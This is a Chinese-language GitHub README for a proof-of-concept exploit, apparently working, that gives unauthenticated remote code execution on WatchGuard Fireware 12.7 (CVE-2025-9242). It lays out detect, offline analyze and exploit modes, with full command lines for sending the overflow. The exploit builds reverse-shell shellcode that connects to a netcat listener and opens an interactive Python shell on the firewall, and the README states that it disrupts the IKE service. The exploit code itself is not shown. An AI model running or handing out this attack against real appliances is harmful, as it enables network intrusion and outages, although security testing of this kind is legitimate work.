UnusualGiraffe/PoC-Unauthenticated-RCE-in-WatchGuard-Fireware-12.7-Build-640389-CVE-2025-9242
GitHub: UnusualGiraffe/PoC-Unauthenticated-RCE-in-WatchGuard-Fireware-12.7-Build-640389-CVE-2025-9242
针对 WatchGuard Fireware 12.7 CVE-2025-9242 预认证 RCE 漏洞的版本固定 PoC 存档,包含安全检测、离线 payload 分析和受控的 exploit 执行三种模式。
Stars: 0 | Forks: 0
# CVE-2025-9242 PoC
本包为以下内容保留了固定版本的 WatchGuard Fireware exploit profile:
- Fireware `12.7`
- build `640389`
- M270 appliance profile
- CVE-2025-9242
它包含一个活跃的预认证远程代码执行 (remote-code-execution) exploit。请仅在您拥有或获得明确授权测试的系统上使用它。成功的 exploit 即使在 callback 未到达时,也会中断 IKE 服务。
## 环境要求
- x86-64 架构的 Linux
- Python 3.11 或更高版本
- 适用于 amd64 的 GNU binutils(pwntools 使用它来汇编 runtime callback)
在隔离的环境中安装 Python 依赖项:
```
python3 -m venv .venv
. .venv/bin/activate
python3 -m pip install -r requirements.txt
```
## 模式
### `detect`
执行一次不溢出的 IKEv2 `IKE_SA_INIT` 交换,读取 vendor 的 version/build 指纹,并报告其是否与存档的 profile 完全匹配。它不会发送 513 字节的漏洞触发器。
```
python3 wg_cve_2025_9242.py detect \
--rhost 192.0.2.10 \
--rport 500
```
使用 `--json` 获取机器可读的输出。
### `analyze`
完全离线运行。它使用文档化的 callback 地址构建一个 reverse-shell payload,检查确切的 profile 常量和 payload 布局,并打印 shellcode/payload 的大小及 SHA-256 哈希值。
```
python3 wg_cve_2025_9242.py analyze
```
要在不发送的情况下检查具有不同 callback 的 payload 结构:
```
python3 wg_cve_2025_9242.py analyze \
--callback-ip 192.0.2.20 \
--callback-port 4444
```
### `exploit`
以相同的非溢出确切版本/构建检测开始。除非实时指纹为 `12.7` / `640389`、同时提供了明确的安全开关,并且 callback 是一个 IPv4 地址,否则它将拒绝继续。
首先启动一个 listener:
```
nc -lvnp 4444
```
然后,针对授权目标运行:
```
python3 wg_cve_2025_9242.py exploit \
--rhost 192.0.2.10 \
--rport 500 \
--callback-ip 192.0.2.20 \
--callback-port 4444 \
--confirm-profile 12.7-640389 \
--acknowledge-service-interruption
```
callback 以通用的 `uid` / `euid` 标志开始,然后暴露设备的 `/usr/bin/python` 交互式解释器。exploit 发送和 callback 成功是相互独立的事实:发送后的超时属于预期情况,并不能证明 reverse shell 已成功连接。
## 离线验证
```
python3 wg_cve_2025_9242.py analyze
sha256sum -c MANIFEST.sha256
```
该包仅包含 CLI、protocol engine、依赖项列表、本 README、上游通知以及 `MANIFEST.sha256`。清单涵盖了其他五个文件。
## 存档边界
本包特意排除了以下内容:
- 真实的目标地址、主机名和业务名称;
- 测试人员身份、工作站路径、callback 服务和 endpoint;
- 凭据、cookie、token、会话材料、抓包记录和日志;
- 生成的 shellcode/payload 二进制大文件;
- 实操记录、发现、客户报告和内部拓扑;
- 字节码缓存、VCS 元数据、时间戳和宿主所有权元数据。
Callback 材料仅在运行时由命令行参数生成。
标签:CISA项目, CVE-2025-9242, Python, WatchGuard, Web报告查看器, 云资产清单, 无后门, 逆向工程